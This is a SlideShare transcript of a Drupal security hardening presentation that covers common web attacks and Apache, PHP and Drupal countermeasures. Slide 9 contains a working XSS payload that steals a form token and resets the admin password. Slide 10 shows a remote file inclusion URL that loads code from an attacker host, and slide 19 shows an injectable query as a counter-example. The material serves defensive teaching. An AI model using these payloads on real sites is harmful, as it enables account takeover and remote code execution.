Agenda●   Anatomy of Vulnerabilities●   Protecting against Vulnerabilities
Kite Systems is an Agile development house which means the client is actively involved    all the way through the developm...
Join Us
About myself, Gerald Villorente●   Web Developer/themer at Kite Systems Inc.●   Drupal developer since 2010●   Drupal PH k...
Is Drupal Secure?
State of being “SECURE”    A site is secure if:●   private data is kept private,●   the site cannot be forced offline or i...
Week spot of web applications    For Drupal developer who wants to deliver an    applications, security do not ends with p...
Common Drupal attacks●   XSS●   CSRF●   Injection
XSS jQuery.get(Drupal.settings.basePath + user/1/edit,   function (data, status) {     if (status == success) {       // E...
Other Attacks●   DDoS●   Remote code execution    - Exploiting register_globals in PHP    require ($page . ".php");    htt...
Demo
Counter Measures●   Proper use of Drupal API●   Coding Standard (coder, code_sniffer)    - Coder & Sniffer demo●   Keep up...
Counter Measures (cont.)●   File permission
Apache Hardening●   Disable unneeded modules●   Implement ModSecurity, Request Filtering,    Anti-Evasion Techniques, HTTP...
Apache Hardening●    Chrooting Apache    $ mkdir -p /var/chroot/apache    $ adduser --home /var/chroot/apache --shell /bin...
PHP Hardening (part 1)●   turn off register_globals●   open_basedir - restrict php file access to only    certain director...
PHP Hardening (part 2)●   Suhoshin    - php engine protection with couple of    patches    - range of runtime protection, ...
Drupal Hardening●   Keep updated●   Coding standard●   Install only trusted module, check issue    queue●   Use captcha, l...
Drupal Hardening: Coding Standard Never write and/or execute sql commands manually, use Drupal DB layer use db_query() pro...
Drupal Hardening: Form API●   never write forms that manually uses Drupals Forms API●   Forms API protects you from invali...
Drupal Hardening: File Upload●   file_validate_is_image - check if file is really    an image●   check_file - check if fil...
Drupal Hardening: Respect and definenew permissions●   consider to use hook_perm in your module●   wrap your code with use...
Drupal Hardening: Dont trust user input    Filter user input, sanitize the output●   Input Format●   filter_xss() - Filter...
Drupal Hardening: Dont trust user input
Again, think like a hacker...●   Use penetration testing tool    - Metasploit framework    - Nessus    - Nikto    - Backbo...
Resources●   http://drupal.org/security●   http://drupal.org/writing-secure-code●   http://crackingdrupal.com●   http://ww...
Drupal Security Hardening
Drupal Security Hardening
Drupal Security Hardening
Drupal Security Hardening
Upcoming SlideShare
Loading in …5
×

Drupal Security Hardening

3,828 views
3,752 views

Published on

All about web application security and common threats and how to counter measure these threats

The content of this presentation was derived from several notable Drupal SA team like Greg Knaddison, Khalid Baheyeldin, Heine Deelstra, and Dave Reid.

Special thanks to Greg's book "Cracking Drupal: A Drop in the Bucket".

Published in: Technology
3 Comments
0 Likes
Statistics
Notes
  • Be the first to like this

No Downloads
Views
Total views
3,828
On SlideShare
0
From Embeds
0
Number of Embeds
8
Actions
Shares
0
Downloads
16
Comments
3
Likes
0
Embeds 0
No embeds

No notes for slide

Drupal Security Hardening

  1. 1. Agenda● Anatomy of Vulnerabilities● Protecting against Vulnerabilities
  2. 2. Kite Systems is an Agile development house which means the client is actively involved all the way through the development process. We build high quality, secure platforms using Java J2EE, Microsoft .NET, Ruby on Rails, PHP and Python.
  3. 3. Join Us
  4. 4. About myself, Gerald Villorente● Web Developer/themer at Kite Systems Inc.● Drupal developer since 2010● Drupal PH kids mentor
  5. 5. Is Drupal Secure?
  6. 6. State of being “SECURE” A site is secure if:● private data is kept private,● the site cannot be forced offline or into a degraded mode by a remote visitor● the site resources are used only for their intended purposes● the site content can be edited only by appropriate users.”
  7. 7. Week spot of web applications For Drupal developer who wants to deliver an applications, security do not ends with proper use of Drupal security API:● OS (MS, Unix, BSD, OS X)● Web Server (Apache, IIS, Nginx, ...)● Web Platform (php, .NET, ...)● Other Services (ftp, …)● Web applications - attacks against authentication & authorization, site structure, input validation, app logic● database - sql injection● availability - DoS attacks
  8. 8. Common Drupal attacks● XSS● CSRF● Injection
  9. 9. XSS jQuery.get(Drupal.settings.basePath + user/1/edit, function (data, status) { if (status == success) { // Extract the token and other required data var matches = data.match(/id="edit-user-profile-form-form-token" value="([a-z0-9])"/); var token = matches[1]; // Post the minimum amount of fields. Other fields get their default values. var payload = { "form_id": user_profile_form, "form_token": token, "pass[pass1]": hacked, "pass[pass2]": hacked }; jQuery.post(Drupal.settings.basePath + user/1/edit, payload); } } ); }
  10. 10. Other Attacks● DDoS● Remote code execution - Exploiting register_globals in PHP require ($page . ".php"); http://www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt
  11. 11. Demo
  12. 12. Counter Measures● Proper use of Drupal API● Coding Standard (coder, code_sniffer) - Coder & Sniffer demo● Keep up with security patches and minor releases● Permission by role (hook_perm, user_access)● Firewall● SSL (Secure Socket Layer)
  13. 13. Counter Measures (cont.)● File permission
  14. 14. Apache Hardening● Disable unneeded modules● Implement ModSecurity, Request Filtering, Anti-Evasion Techniques, HTTP Filtering Rules, Full Audit Logging, HTTPS Intercepting, Chroot Functionality, Mask Web Server Identity● Document root restriction – allow Apache to only go to /path/to/public_html
  15. 15. Apache Hardening● Chrooting Apache $ mkdir -p /var/chroot/apache $ adduser --home /var/chroot/apache --shell /bin/false --no-create-home --system --group juandelacruz
  16. 16. PHP Hardening (part 1)● turn off register_globals● open_basedir - restrict php file access to only certain directories● disable_functions● expose_php - remove php info from http headers● display_errors● safe_mode - php can use only files which it is an owner● allow_url_fopen
  17. 17. PHP Hardening (part 2)● Suhoshin - php engine protection with couple of patches - range of runtime protection, session protection, filtering features and logging - features
  18. 18. Drupal Hardening● Keep updated● Coding standard● Install only trusted module, check issue queue● Use captcha, login_security, single_login, password_policy, salt● user permission● input formats and filter
  19. 19. Drupal Hardening: Coding Standard Never write and/or execute sql commands manually, use Drupal DB layer use db_query() properly dont write db_query("SELECT * FROM {users} WHERE name = $username") ; write this db_query("SELECT * FROM {users} WHERE name = %s", $username); placeholders are: %s, %d, %f, %b, %% use db_rewrite_sql to respect node access restrictions $result = db_query(db_rewrite_sql("SELECT n.nid, n.title FROM {node} n"));
  20. 20. Drupal Hardening: Form API● never write forms that manually uses Drupals Forms API● Forms API protects you from invalid form data● Forms API protects you against CSRF● dont trust js for input validation - its easy to disable it. If you want to use it always check user data on server side.● when using AJAX use drupal_get_token and drupal_check_token:● Calculate hash of defined string, user session and site specific secret code
  21. 21. Drupal Hardening: File Upload● file_validate_is_image - check if file is really an image● check_file - check if file is uploaded via HTTP POST● file_check_location - Check if a file is really located inside $directory● set disk quotes properly - you dont want to fill server hard disk
  22. 22. Drupal Hardening: Respect and definenew permissions● consider to use hook_perm in your module● wrap your code with user_access if (user_access(some permission)) { .... }● filter_access($format) – check if user has access to requested filter format● use menu access arguments
  23. 23. Drupal Hardening: Dont trust user input Filter user input, sanitize the output● Input Format● filter_xss() - Filters HTML to prevent XSS● check_plain() - Encodes special characters in a plain-text string for display as HTML● check_url() - filter dangerous protocol● check_markup - Run all the enabled filters on a piece of text
  24. 24. Drupal Hardening: Dont trust user input
  25. 25. Again, think like a hacker...● Use penetration testing tool - Metasploit framework - Nessus - Nikto - Backbox and Backtrack● Fix, audit, fix ...
  26. 26. Resources● http://drupal.org/security● http://drupal.org/writing-secure-code● http://crackingdrupal.com● http://www.owasp.org● http://ha.ckers.org● http://www.exploit-db.com

×